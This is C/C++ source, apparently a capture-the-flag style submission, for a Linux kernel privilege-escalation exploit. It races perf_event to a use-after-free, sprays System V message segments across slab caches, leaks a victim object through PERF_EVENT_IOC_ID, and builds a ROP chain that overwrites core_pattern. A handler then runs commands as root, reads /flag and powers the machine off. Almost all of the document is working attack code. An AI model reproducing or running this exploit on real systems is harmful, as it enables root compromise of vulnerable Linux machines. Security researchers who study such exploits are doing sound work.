futex_ret = 0; + int futex_errno = 0; + int warn_seen_stage = 0; + int spray_gate_opened = 0; + + attempt_seq++; + if (tp_prepare_target_slot_for_attempt(perf_fd_idx, TP_FIXED_TARGET_SLOT_RCU_WAIT_US) != 0) { + if ((i % 100) == 0) + log_warn("attempt %d: failed to prepare target slot idx=%d", i, perf_fd_idx); + continue; + } + if (cfg.drain_every_attempts > 1) + tp_maybe_low_freq_drain(&cfg, attempt_seq); + + taint_before_ok = (tp_read_kernel_tainted(&taint_before) == 0); + before_warn = taint_before_ok ? tp_taint_warn_bit_set(taint_before) : -1; + + (void)tp_run_one_attempt(&cfg, filter_expr, NULL, NULL, + &futex_ret, &futex_errno, + NULL, NULL, + NULL, NULL, + NULL, NULL, + NULL, NULL, NULL, + NULL, NULL, NULL, + NULL, NULL, + NULL, NULL, + NULL, &warn_seen_stage, + NULL, NULL, + NULL, NULL, + NULL, + NULL, &spray_gate_opened, + NULL, NULL, + perf_fd_idx); + + taint_after_ok = (tp_read_kernel_tainted(&taint_after) == 0); + after_warn = taint_after_ok ? tp_taint_warn_bit_set(taint_after) : -1; + + if (!taint_before_ok || !taint_after_ok) { + if ((i % 100) == 0) + log_warn("attempt %d: tainted read failed", i); + continue; + } + + if (before_warn) { + log_warn("tainted WARN bit already set before attempt (cannot attribute)"); + continue; + } + + hit = (!before_warn && after_warn) ? 
1 : 0; + if (hit) { + log_info("WARN hit at round=%d profile=%s attempt=%d futex_state=%s warn_seen_stage=%d spray_gate_opened=%d", + round, cfg.profile_name, i, + tp_futex_wait_state_string(futex_ret, futex_errno), + warn_seen_stage, spray_gate_opened); + round_hit = 1; + __atomic_store_n(&tp_warn_hit, 1, __ATOMIC_RELEASE); + break; + } + } + + if (round_hit) { + __atomic_store_n(&tp_race_success, 1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE); + uint64_t orch_gate_ns = get_time_ns(); + if (tp_try_open_spray_gate(orch_gate_ns)) { + uint64_t orch_wait_start = get_time_ns(); + while ((get_time_ns() - orch_wait_start) < TP_FIXED_WARN_HOLD_MAX_NS) { + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + if (first_alloc_ns > 0 && + (get_time_ns() - orch_wait_start) >= TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS) + break; + tp_cpu_relax_once(); + } + } + free(filter_expr); + return NULL; + } + } + + log_warn("WARN not hit after %d round(s), each %d attempts", TP_MAX_ROUNDS, cfg.tries_per_round); + __atomic_store_n(&tp_race_success, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + free(filter_expr); + return NULL; +} + +void *tp_control_thread(void *arg) +{ + (void)arg; + while (!stop_threads && !exit_threads) + usleep(20000); + return NULL; +} + +void *tp_closer_thread(void *arg) +{ + (void)arg; + while (!stop_threads && !exit_threads) + usleep(20000); + return NULL; +} + +/* ================================================================ + * New TP Code End + * ================================================================ + */ + +void cleanup_resources() { + tp_log_stage_summary(); + + if (crash_child_pid > 0) { + kill(crash_child_pid, SIGKILL); + waitpid(crash_child_pid, NULL, 0); + crash_child_pid = -1; + } + + for (int i = 0; i < MSG_SPRAY_COUNT; 
i++) { + if (msg_queue_ids[i] != -1) { + msgctl(msg_queue_ids[i], IPC_RMID, NULL); + msg_queue_ids[i] = -1; + } + } + for (int i = 0; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) { + if (msg_fake_ids[i] != -1) { + msgctl(msg_fake_ids[i], IPC_RMID, NULL); + msg_fake_ids[i] = -1; + } + } +} + + + + +size_t ktext; +Target *g_target = nullptr; + +int bind_to_cpu(int cpu_id) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu_id, &mask); + if (sched_setaffinity(0, sizeof(mask), &mask) < 0) { + perror("sched_setaffinity"); + return -1; + } + sched_yield(); + return 0; +} + +const char desired_core_pattern[] = "|/proc/%P/fd/666 %P"; + +void core_pattern_handler(char **argv) +{ + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + if(system("id")){}; + if(system("cat /flag;sleep 1;echo o>/proc/sysrq-trigger")){}; + exit(0); +} + +int check_core() +{ + char buf[0x100] = {0}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if(read(core, buf, sizeof(buf))){}; + close(core); + return strncmp(buf, desired_core_pattern, strlen(desired_core_pattern)) == 0; +} + +void crash() +{ + int memfd = memfd_create("", 0); + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); + dup2(memfd, 666); + close(memfd); + + while (check_core() == 0) + sleep(1); + + *(size_t *)0 = 0; +} + +void user_synchronize_rcu(void) +{ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); +} + + +#define FALLOC_LEN 4096 +char *fmap; + +// ----------------------------------------------------------- +// Thread 4: Sprayer (Occupier Event B) - CPU 3 +// ----------------------------------------------------------- + +struct spray_thread_arg { + int index; + pthread_barrier_t *start_barrier; +}; + +static pthread_t 
spray_threads[SPRAY_B_COUNT]; +static struct spray_thread_arg spray_args[SPRAY_B_COUNT]; +static pthread_barrier_t spray_start_barrier; + +void *single_spray_thread(void *arg) +{ + struct spray_thread_arg *targ = (struct spray_thread_arg *)arg; + int idx = targ->index; + + bind_to_cpu(0); + + struct perf_event_attr spray_attr; + memset(&spray_attr, 0, sizeof(spray_attr)); + spray_attr.type = PERF_TYPE_SOFTWARE; + spray_attr.size = sizeof(struct perf_event_attr); + spray_attr.config = PERF_COUNT_SW_CPU_CLOCK; + spray_attr.disabled = 1; + spray_attr.exclude_kernel = 1; + + pthread_barrier_wait(targ->start_barrier); + if (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) <= 0 || stop_threads || exit_threads) + return NULL; + + if (idx >= TP_SPRAY_PHASEA_COUNT) { + uint64_t delay_ns = (uint64_t)TP_SPRAY_PHASEB_BASE_DELAY_NS; + + if (TP_SPRAY_PHASEB_STEPS > 0 && TP_SPRAY_PHASEB_STEP_NS > 0) { + int lane = (idx - TP_SPRAY_PHASEA_COUNT) % TP_SPRAY_PHASEB_STEPS; + + delay_ns += (uint64_t)lane * (uint64_t)TP_SPRAY_PHASEB_STEP_NS; + } + + tp_spin_delay_ns(delay_ns); + } + + spray_b_fds[idx] = perf_event_open(&spray_attr, 0, -1, -1, 0); + if (spray_b_fds[idx] >= 0) { + uint64_t now_ns = get_time_ns(); + uint64_t expect = 0; + + if (__atomic_compare_exchange_n(&tp_first_spray_alloc_ns, &expect, now_ns, 0, + __ATOMIC_ACQ_REL, __ATOMIC_ACQUIRE)) + __atomic_store_n(&tp_first_spray_alloc_idx, idx, __ATOMIC_RELEASE); + } + __atomic_fetch_add(&tp_spray_open_done, 1, __ATOMIC_ACQ_REL); + + while (!exit_threads) { + sleep(1); + } + + return NULL; +} + +void *sprayer_thread(void *arg) +{ + bind_to_cpu(1); + int gate_opened = 0; + uint64_t wait_start_ns; + uint64_t now_ns; + int open_done; + + for (int i = 0; i < SPRAY_B_COUNT; i++) + spray_b_fds[i] = -1; + + __atomic_store_n(&tp_first_spray_alloc_ns, 0, __ATOMIC_RELEASE); + __atomic_store_n(&tp_first_spray_alloc_idx, -1, __ATOMIC_RELEASE); + __atomic_store_n(&tp_spray_open_done, 0, __ATOMIC_RELEASE); + + 
pthread_barrier_init(&spray_start_barrier, NULL, SPRAY_B_COUNT + 1); + + for (int i = 0; i < SPRAY_B_COUNT; i++) { + spray_args[i].index = i; + spray_args[i].start_barrier = &spray_start_barrier; + pthread_create(&spray_threads[i], NULL, single_spray_thread, &spray_args[i]); + } + + log_dbg("[Spray Event] precreated %d spray threads, waiting WARN gate...", SPRAY_B_COUNT); + + while (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) == 0 && + !stop_threads && !exit_threads) { + usleep(1000); + } + + if (__atomic_load_n(&tp_spray_gate, __ATOMIC_ACQUIRE) > 0 && + !stop_threads && !exit_threads) + gate_opened = 1; + + log_info("[Spray Event] Release precreated spray threads (gate_opened=%d)...", gate_opened); + if (gate_opened && TP_GATE_RELEASE_DELAY_NS > 0) + tp_spin_delay_ns((uint64_t)TP_GATE_RELEASE_DELAY_NS); + pthread_barrier_wait(&spray_start_barrier); + + if (!gate_opened) { + if (write(sync_pipe[1], "F", 1) != 1) + log_warn("write sync_pipe failed"); + goto out_join; + } + + wait_start_ns = get_time_ns(); + while (__atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE) == 0 && + !stop_threads && !exit_threads) { + now_ns = get_time_ns(); + if (now_ns - wait_start_ns >= TP_SPRAY_FIRST_ALLOC_WAIT_NS) + break; + tp_spin_delay_ns(20000); + } + + if (write(sync_pipe[1], "C", 1) != 1) + log_warn("write sync_pipe failed"); + + wait_start_ns = get_time_ns(); + while (!stop_threads && !exit_threads) { + open_done = __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE); + if (open_done >= SPRAY_B_COUNT) + break; + now_ns = get_time_ns(); + if (now_ns - wait_start_ns >= TP_SPRAY_DONE_WAIT_NS) + break; + tp_spin_delay_ns(100000); + } + + open_done = __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE); + log_dbg("[Spray Event] spray open progress: %d/%d", open_done, SPRAY_B_COUNT); + + { + uint64_t warn_ns = __atomic_load_n(&tp_warn_gate_open_ns, __ATOMIC_ACQUIRE); + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + uint64_t 
gate_release_ns = get_time_ns();
        int first_idx = __atomic_load_n(&tp_first_spray_alloc_idx, __ATOMIC_ACQUIRE);
        unsigned long long gate_to_release_ns = 0ULL;

        // Log the warn_ns -> first_alloc_ns delta only when both stamps are set
        // and ordered; otherwise log the raw values so a miss can be diagnosed.
        if (warn_ns > 0 && first_alloc_ns >= warn_ns) {
            uint64_t delta_ns = first_alloc_ns - warn_ns;

            log_info("WARN->spray_first_alloc delta_ns=%llu (%.3f ms) first_idx=%d",
                     (unsigned long long)delta_ns, (double)delta_ns / 1000000.0, first_idx);
        } else {
            log_warn("WARN->spray_first_alloc delta unavailable warn_ns=%llu first_alloc_ns=%llu idx=%d",
                     (unsigned long long)warn_ns, (unsigned long long)first_alloc_ns, first_idx);
        }
        // Elapsed time from warn_ns to the gate_release_ns stamp taken above;
        // stays 0 when warn_ns is unset or later than that stamp.
        if (warn_ns > 0 && gate_release_ns >= warn_ns)
            gate_to_release_ns = (unsigned long long)(gate_release_ns - warn_ns);
        log_dbg("spray gate release delay configured_ns=%llu observed_ns=%llu",
                (unsigned long long)TP_GATE_RELEASE_DELAY_NS, gate_to_release_ns);
    }

    user_synchronize_rcu();

    log_dbg("Clean sprayed perf finished");

// Reached both by falling through and via `goto out_join` on the gate-miss path.
out_join:
    for (int i = 0; i < SPRAY_B_COUNT; i++) {
        pthread_join(spray_threads[i], NULL);
    }

    stop_threads = 1;

    pthread_barrier_destroy(&spray_start_barrier);

    // Idle in 1-second sleeps until exit_threads is set elsewhere.
    while (!exit_threads) {
        sleep(1);
    }

    return NULL;
}

/*
 * Create the System V message queues used by the later spray stages.
 *
 * Fills msg_queue_ids[0 .. MSG_SPRAY_COUNT) and
 * msg_fake_ids[0 .. MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT) with fresh
 * IPC_PRIVATE queues (mode 0644). Any msgget() failure prints the error
 * and terminates the process with exit status 1.
 */
void setup_msg_queues() {
    printf("[*] Setting up %d message queues...\n", MSG_SPRAY_COUNT);
    for (int i = 0; i < MSG_SPRAY_COUNT; i++) {
        if ((msg_queue_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
            perror("msgget");
            exit(1);
        }
    }
    for (int i = 0 ; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) {
        if ((msg_fake_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
            perror("msgget");
            exit(1);
        }
    }
}

/*
 * Write one field of the evt_idx-th PERF_EVENT_SIZE-sized object into a
 * segment payload buffer, refusing writes that cannot land or that clash
 * with an earlier write.
 *
 * The field's absolute position (evt_idx * PERF_EVENT_SIZE + field_offset)
 * is reduced modulo MSG_SEG_SIZE, then shifted down by MSG_SEG_HEADER_SZ to
 * obtain the index into `buffer`.
 * (presumably MSG_SEG_HEADER_SZ is the kernel-side segment header that user
 * data cannot reach -- confirm against its definition.)
 *
 * buffer       payload bytes being assembled (MSG_SEG_PAYLOAD_SIZE long)
 * shadow_map   parallel byte map; non-zero marks bytes already written
 * evt_idx      index of the object within the run of back-to-back objects
 * field_name   used only in the conflict log message
 * field_offset offset of the field inside one object
 * value, size  value to store and number of low-order bytes of it to copy
 *
 * Returns 0 on success, -1 if the field falls inside the first
 * MSG_SEG_HEADER_SZ bytes of a segment, -2 if it would run past
 * MSG_SEG_PAYLOAD_SIZE, -3 if it overlaps previously written bytes that hold
 * a different value.
 */
int safe_write_field_tagged(char *buffer, char *shadow_map, int evt_idx, const char *field_name,
                            int field_offset, uint64_t value, int size)
{
    int evt_base = evt_idx * PERF_EVENT_SIZE;
    int field_page_offset = evt_base + field_offset;

    int offset_in_msg = field_page_offset % MSG_SEG_SIZE;

    if (offset_in_msg < MSG_SEG_HEADER_SZ) {
        return -1;
    }

    int write_offset = offset_in_msg - MSG_SEG_HEADER_SZ;

    if (write_offset + size > MSG_SEG_PAYLOAD_SIZE) return -2;

    // Any already-claimed byte in the target range counts as an overlap.
    int is_conflict = 0;
    for (int i = 0; i < size; i++) {
        if (shadow_map[write_offset + i]) {
            is_conflict = 1;
            break;
        }
    }

    if (is_conflict) {
        // Only 8- and 4-byte fields are read back; for any other size
        // current_val stays 0 and is compared against `value` as-is.
        uint64_t current_val = 0;
        if (size == 8) current_val = *(uint64_t*)(buffer + write_offset);
        else if (size == 4) current_val = *(uint32_t*)(buffer + write_offset);

        // An overlap is tolerated only when it would store the same value.
        if (current_val != value) {
            log_warn("CONFLICT: Event[%d].%s wants 0x%lx, found 0x%lx (overlap)",
                     evt_idx, field_name, value, current_val);
            return -3;
        }
    }

    memcpy(buffer + write_offset, &value, size);

    // Claim the bytes so later writes can detect overlaps.
    memset(shadow_map + write_offset, 1, size);

    return 0;
}


/*
 * Fill `buffer` (MSG_SEG_PAYLOAD_SIZE bytes) with self-describing 8-byte
 * tags, then overlay the `ctx` and `parent` fields for 12 candidate object
 * positions.
 *
 * Each 8-byte slot i holds (msg_idx << 32) | (i * 8), i.e. the message tag in
 * the high half and the slot's byte offset in the low half; locate_and_leak()
 * decodes a value read back through PERF_EVENT_IOC_ID using this same layout.
 * The overlay stores ktext + offset("core_pattern") in `ctx` and 0 in
 * `parent`. The return codes of safe_write_field_tagged() are ignored, so
 * fields that cannot land (-1/-2) or that conflict (-3) are silently skipped.
 */
void prepare_id_probe_payload(char *buffer, int msg_idx) {
    char shadow_map[MSG_SEG_PAYLOAD_SIZE];
    memset(shadow_map, 0, MSG_SEG_PAYLOAD_SIZE);

    uint64_t *p64 = (uint64_t *)buffer;
    for (int i = 0; i < MSG_SEG_PAYLOAD_SIZE / 8; i++) {
        uint64_t offset = i * 8;
        p64[i] = ((uint64_t)msg_idx << 32) | offset;
    }

    int off_ctx = g_target->GetFieldOffset("perf_event", "ctx");
    int off_parent = g_target->GetFieldOffset("perf_event", "parent");
    uint64_t fake_ctx_addr = ktext + g_target->GetSymbolOffset("core_pattern");
    for (int evt_idx = 0; evt_idx < 12; evt_idx++) {
        safe_write_field_tagged(buffer, shadow_map, evt_idx, "ctx", off_ctx, fake_ctx_addr, 8);

        safe_write_field_tagged(buffer, shadow_map, evt_idx, "parent", off_parent, 0, 8);
    }
}

/*
 * Send one tagged message to each of the MSG_SPRAY_COUNT queues created by
 * setup_msg_queues().
 *
 * Message i uses mtype i + 1 and a seg_text tagged with i + 1 (see
 * prepare_id_probe_payload()). msg_text is never written here, so whatever
 * the stack held is sent in that part. msgsnd() failures are ignored.
 */
void spray_tagged_payload() {
    struct {
        long mtype;
        char msg_text[MSG_MSG_PAYLOAD_SZ];
        char seg_text[MSG_SEG_PAYLOAD_SIZE];
    } msg;

    log_dbg("Spraying Tagged Payloads (Stage 1)...");

    log_dbg("Spraying msg_msgseg Payloads (Stage 1)...");
    for (int i = 0; i < MSG_SPRAY_COUNT; i++) {
        msg.mtype = i + 1;

        prepare_id_probe_payload(msg.seg_text, i + 1);

        if (msgsnd(msg_queue_ids[i], &msg, MTEXT_SIZE, IPC_NOWAIT) < 0) {
            // handle error
        }
    }
}

void
prepare_final_release_payload_xdk(char *buffer, int seg_start_rel_to_event,
                                  const std::vector &payload_data) {
    /*
     * Copy into `buffer` the slice of `payload_data` that overlaps the payload
     * area of one segment.
     *
     * All positions are measured from the start of the fake object:
     * the segment begins at seg_start_rel_to_event, its payload area covers
     * [seg_start + MSG_SEG_HEADER_SZ, seg_start + MSG_SEG_SIZE), and
     * payload_data covers [0, payload_data.size()). The intersection of the
     * two ranges is copied to the matching offset inside `buffer`; nothing is
     * written when they do not intersect. Bytes of `buffer` outside the
     * intersection are left untouched.
     *
     * NOTE(review): `std::vector` has no template argument here -- it looks
     * stripped by text extraction (angle brackets lost); confirm against the
     * original file.
     */
    int seg_payload_start_rel = seg_start_rel_to_event + MSG_SEG_HEADER_SZ;
    int seg_payload_end_rel = seg_start_rel_to_event + MSG_SEG_SIZE;

    // Clamp the segment's payload range to [0, payload_data.size()).
    int start = (0 > seg_payload_start_rel) ? 0 : seg_payload_start_rel;
    int end = ((int)payload_data.size() < seg_payload_end_rel) ? (int)payload_data.size() : seg_payload_end_rel;

    if (start < end) {
        memcpy(buffer + (start - seg_payload_start_rel),
               payload_data.data() + start, end - start);
    }
}

/*
 * Receive (and thereby dequeue) one message of type `msgtyp` from `msqid`.
 *
 * `msgsz` is the size of the whole buffer at `msgp` including the leading
 * `long` mtype, so sizeof(long) is subtracted before calling msgrcv().
 * The call uses flags 0. Returns 0 on success, -1 after perror() on failure.
 */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
        perror("[-] msgrcv read");
        return -1;
    }
    return 0;
}

/*
 * Read the event ID through `victim_perf_fd`, decode it as a tag written by
 * prepare_id_probe_payload(), and -- if the tag is plausible -- run the final
 * free/refill/close sequence.
 *
 * Returns -1 when the ioctl fails or when the decoded message index is not
 * inside (0, MSG_SPRAY_COUNT). On every other path the function ends the
 * process itself: exit(1) if the payload builder fails, exit(0) after the
 * final close().
 *
 * Progress is published through the tp_* atomics (oracle hit, victim index,
 * final-stage flag/result, failure reason).
 */
int locate_and_leak(int victim_perf_fd) {
    uint64_t id_val = 0;

    if (ioctl(victim_perf_fd, PERF_EVENT_IOC_ID, &id_val) < 0) {
        return -1;
    }

    // Tag layout: high 32 bits = message tag (queue index + 1),
    // low 32 bits = byte offset of the 8-byte slot within the segment payload.
    int victim_msg_idx = (int)(id_val >> 32) - 1;
    int id_offset_in_msg = (int)(id_val & 0xFFFFFFFF);

    log_info("Oracle Hit! Victim Msg Index: %d, Event ID Offset: 0x%x",
             victim_msg_idx, id_offset_in_msg);
    __atomic_store_n(&tp_oracle_hit, 1, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_victim_msg_idx, victim_msg_idx, __ATOMIC_RELEASE);

    // Only allow final stage when victim_idx > 0.
    if (victim_msg_idx <= 0 || victim_msg_idx >= MSG_SPRAY_COUNT) {
        log_warn("Leak none poisoned data: 0x%lx", id_val);
        __atomic_store_n(&tp_fail_reason, TP_FAIL_ORACLE_BAD_INDEX, __ATOMIC_RELEASE);
        return -1;
    }

    // 3. [Final Exploit]
    log_info("=============================================");
    log_info("Starting Final Exploitation Sequence...");
    __atomic_store_n(&tp_final_stage_entered, 1, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_final_result, 1, __ATOMIC_RELEASE);

    // Derive where the object starts relative to the victim segment:
    // the `id` field was observed at (payload offset + header size) inside
    // the segment, and `id` sits off_event_id bytes into the object.
    int off_event_id = g_target->GetFieldOffset("perf_event", "id");
    int real_id_offset_in_seg = id_offset_in_msg + MSG_SEG_HEADER_SZ;
    int event_offset_in_victim = real_id_offset_in_seg - off_event_id;
    // Same distance seen from the object: where the victim segment starts
    // relative to the object's first byte.
    int victim_seg_rel_to_event = -event_offset_in_victim;

    // Build fake event payload using kernelXDK symbols
    auto off_ctx     = g_target->GetFieldOffset("perf_event", "ctx");
    auto off_rb      = g_target->GetFieldOffset("perf_event", "rb");
    auto off_pmu     = g_target->GetFieldOffset("perf_event", "pmu");
    auto off_prog    = g_target->GetFieldOffset("perf_event", "prog");
    auto off_cgrp    = g_target->GetFieldOffset("perf_event", "cgrp");
    auto off_filters = g_target->GetFieldOffset("perf_event", "addr_filters");
    auto off_refcount= g_target->GetFieldOffset("perf_event", "refcount");
    auto off_destroy = g_target->GetFieldOffset("perf_event", "destroy");
    auto off_state   = g_target->GetFieldOffset("perf_event", "state");
    auto off_attach_state = g_target->GetFieldOffset("perf_event", "attach_state");

    const uint64_t core_pattern_addr = ktext + g_target->GetSymbolOffset("core_pattern");

    // Build event buffer with safety fields + ROP chain
    Payload p(PERF_EVENT_SIZE);

    p.SetU64(off_ctx, 0);
    p.SetU64(off_rb, 0);
    p.SetU64(off_pmu, core_pattern_addr);
    p.SetU64(off_prog, 0);
    p.SetU64(off_cgrp, 0);
    p.SetU64(off_filters, 0);
    p.SetU32(off_refcount, 1);
    p.SetU32(off_state, 0);
    p.SetU32(off_attach_state, 0);

    // ROP body: overwrite kernel core_pattern with desired_core_pattern using
    // pre-built WRITE_WHAT_WHERE_64 actions, then msleep.
    RopChain rop(*g_target, ktext);
    for (size_t i = 0; i < sizeof(desired_core_pattern); i += 8) {
        // Pack up to 8 bytes per action; a short final chunk is zero-padded.
        uint64_t v = 0;
        size_t n = sizeof(desired_core_pattern) - i;
        memcpy(&v, desired_core_pattern + i, n < 8 ? n : 8);
        rop.AddRopAction(RopActionId::WRITE_WHAT_WHERE_64,
                         {core_pattern_addr + i, v});
    }
    rop.AddRopAction(RopActionId::MSLEEP, {0x10000});

    // NOTE(review): presumably (Register::RBX, off_destroy) tells the builder
    // which register addresses the payload and which slot receives the entry
    // pointer -- confirm against the kernelXDK PayloadBuilder documentation.
    PayloadBuilder builder(g_target->GetPivots(), ktext);
    builder.AddPayload(p, Register::RBX, off_destroy);
    builder.AddRopChain(rop);
    if (!builder.Build()) {
        log_warn("PayloadBuilder failed to assemble fake_event ROP");
        exit(1);
    }

    // Snapshot the assembled bytes into a local vector.
    // NOTE(review): `std::vector` lacks its template argument here too -- see
    // the same extraction concern on prepare_final_release_payload_xdk().
    auto& payload_data = p.GetData();
    std::vector xdk_payload(payload_data.begin(), payload_data.end());
    log_info("kernelXDK payload built (%zu bytes)", xdk_payload.size());

    log_info("Event starts at %d bytes relative to Victim Seg", event_offset_in_victim);

    // Dequeue the messages up to `window` queue indices on either side of the
    // victim (the victim itself is kept for now).
    int window = 16;
    log_info("Freeing Neighbor Segments...");

    char msg_buf_temp[0x2000];

    for (int i = victim_msg_idx - window; i <= victim_msg_idx + window; i++) {
        if (i < 0 || i >= MSG_SPRAY_COUNT || i == victim_msg_idx) continue;
        if (read_msg(msg_queue_ids[i], &msg_buf_temp, 0x2000, i + 1) < 0) {
            log_warn("Free neighbor %d failed", i);
        }
    }

    log_info("Spraying Stage 2 (Neighbors)...");
    struct {
        long mtype;
        char msg_text[MSG_MSG_PAYLOAD_SZ];
        char seg_text[MSG_SEG_PAYLOAD_SIZE];
    } spray_msg;

    // Each stage-2 message carries both the slice a segment one MSG_SEG_SIZE
    // before the victim would need and the slice one MSG_SEG_SIZE after it,
    // merged into the same zeroed seg_text.
    for (int i = 0; i < MSG_FAKE_A_COUNT; i++) {
        memset(spray_msg.seg_text, 0, MSG_SEG_PAYLOAD_SIZE);

        // Prev_Rel = Victim_Rel - MSG_SEG_SIZE
        prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event - MSG_SEG_SIZE, xdk_payload);

        // Next_Rel = Victim_Rel + MSG_SEG_SIZE
        prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event + MSG_SEG_SIZE, xdk_payload);

        spray_msg.mtype = i + 1;
        // Send failures are deliberately ignored here (empty body).
        if (msgsnd(msg_fake_ids[i], &spray_msg, MTEXT_SIZE, IPC_NOWAIT) < 0) {
        }
    }


    log_info("Freeing Victim Segment %d...", victim_msg_idx);
    if (read_msg(msg_queue_ids[victim_msg_idx], &msg_buf_temp, 0x2000, victim_msg_idx + 1) < 0) {
        log_warn("Failed to free victim!");
    }


    // Stage 3 uses the remaining MSG_FAKE_B_COUNT queues and a seg_text built
    // once for the victim segment's own position.
    log_info("Spraying Stage 3 (Victim)...");
    memset(spray_msg.seg_text, 0, MSG_SEG_PAYLOAD_SIZE);
    prepare_final_release_payload_xdk(spray_msg.seg_text, victim_seg_rel_to_event, xdk_payload);
    for (int i = MSG_FAKE_A_COUNT; i < MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT; i++) {
        spray_msg.mtype = i + 1;
        if (msgsnd(msg_fake_ids[i], &spray_msg, MTEXT_SIZE, IPC_NOWAIT) < 0) {
            log_warn("Failed to refill victim!");
        }
    }

    // Trigger
    log_info("[!!!] Triggering perf_release (ROP)...");
    close(victim_perf_fd);
    __atomic_store_n(&tp_final_result, 2, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE);

    log_info("Exploit triggered successfully! Master process exiting...");
    exit(0);
}

/*
 * Close the perf event fds in a fixed order, wait for RCU, then hand over to
 * spray_tagged_payload() and locate_and_leak(victim_perf_fd).
 *
 * Never returns: it ends in exit(1) when locate_and_leak() reports failure
 * and in exit(0) otherwise. Reads the globals set up by
 * locate_victim_event() (victim_perf_fd, victim_perf_idx, spray_c_count)
 * together with total_fds, spray_b_fds/spray_b_ids and perf_fd_idx.
 */
void cross_cache_attack()
{
    log_info("Phase 1: Freeing & Draining Slabs...");

    int empty_boundary = EMPTY_SLABS * OBJS_PER_SLAB;
    for (int i = 0; i < empty_boundary; i++) {
        // At index perf_fd_idx, total_fds[i] itself is not closed; a special
        // batch of closes runs instead.
        if (i == perf_fd_idx) {
            log_dbg("Clean overlapped event c, fd: %d", spray_c_fds[spray_c_count]);
            close(spray_c_fds[spray_c_count]);
            spray_c_fds[spray_c_count] = -1;

            // Close every spray_b event (except the victim) whose recorded ID
            // lies in [victim_id - OBJS_PER_SLAB, victim_id + 2].
            for (int j = 0; j < SPRAY_B_COUNT; j++) {
                if (j != victim_perf_idx
                    && spray_b_ids[j] >= spray_b_ids[victim_perf_idx] - OBJS_PER_SLAB
                    && spray_b_ids[j] <= spray_b_ids[victim_perf_idx] + 2) {
                    log_dbg("Close sprayed event b, fd: %d, id: %ld", spray_b_fds[j], spray_b_ids[j]);
                    close(spray_b_fds[j]);
                    spray_b_fds[j] = -1;
                }
            }

            // Close the last OBJS_PER_SLAB entries of total_fds, newest first.
            // The entries are not reset to -1 afterwards.
            for (int j = TOTAL_OBJS - 1; j >= TOTAL_OBJS - OBJS_PER_SLAB; j--) {
                if (total_fds[j] != -1) {
                    log_dbg("Close total event, fd: %d", total_fds[j]);
                    close(total_fds[j]);
                }
            }

            continue;
        }
        if (total_fds[i] != -1)
            close(total_fds[i]);
    }

    log_warn("Flushing Active Slab (Force Unfreeze)...");

    #define FLUSH_COUNT 32
    int flush_fds[FLUSH_COUNT];
    struct perf_event_attr flush_attr;
    memset(&flush_attr,
0, sizeof(flush_attr));
    flush_attr.type = PERF_TYPE_SOFTWARE;
    flush_attr.size = sizeof(struct perf_event_attr);
    flush_attr.config = PERF_COUNT_SW_CPU_CLOCK;
    flush_attr.disabled = 1;
    flush_attr.exclude_kernel = 1;
    // Open FLUSH_COUNT disabled software cpu-clock events, then close them all
    // again (the log line before this block calls this flushing the active slab).
    for (int i = 0; i < FLUSH_COUNT; i++) {
        flush_fds[i] = perf_event_open(&flush_attr, 0, -1, -1, 0);
    }

    for (int i = 0; i < FLUSH_COUNT; i++) {
        if (flush_fds[i] != -1) close(flush_fds[i]);
    }

    log_info("Step 3: Evicting cpu_partial to flush empty slabs...");
    // Close one fd every OBJS_PER_SLAB entries, starting at empty_boundary,
    // for EVICT_SLABS iterations (bounded by TOTAL_OBJS).
    for (int i = 0; i < EVICT_SLABS; i++) {
        int idx = empty_boundary + (i * OBJS_PER_SLAB);
        if (idx < TOTAL_OBJS && total_fds[idx] != -1) {
            close(total_fds[idx]);
            total_fds[idx] = -1;
        }
    }

    // 4. Wait RCU
    log_info("Waiting for RCU grace period...");
    user_synchronize_rcu();
    usleep(50000);

    log_info("Step 4: Starting Double UAF Sequence...");
    spray_tagged_payload();
    if (locate_and_leak(victim_perf_fd) < 0) {
        log_warn("Exploit failed!");
        // Keep a more specific reason if locate_and_leak() already set one.
        if (__atomic_load_n(&tp_fail_reason, __ATOMIC_ACQUIRE) == TP_FAIL_NONE)
